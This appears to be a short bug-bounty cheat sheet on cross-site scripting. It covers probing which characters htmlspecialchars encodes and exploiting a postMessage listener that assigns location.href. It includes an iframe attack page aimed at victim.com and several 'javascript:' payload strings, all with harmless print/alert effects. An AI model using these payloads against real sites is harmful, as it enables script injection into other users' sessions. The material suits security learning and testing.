XSS
Encode by htmlspecialchars
Try this payload first, to identify which the chars that encoded:
!@#$%^&*()}{\'\"|?><`~}
Tips:
Look at other reflected in the html code, maybe in the tag <script> or something els.
Dom XSS
EventListener Message
identify this in the javascript
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
alert();
}
}, false);
</script>
event message
mean that the web application receive the message from method postMessage
so we can use iframe to interact with the web application via postMessage
create a web hook with this payload
<html>
<h1>Test</h1>
<iframe src=https://victim.com/ onload="this.contentWindow.postMessage('javascript:print();alert(`http:`)','*')" >
</html>
other payload work with DOM location.href.
javascript:print()//http:
javascript:print();alert(`http:`)
javascript:print();var=`http:`;
reference:
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md
Last updated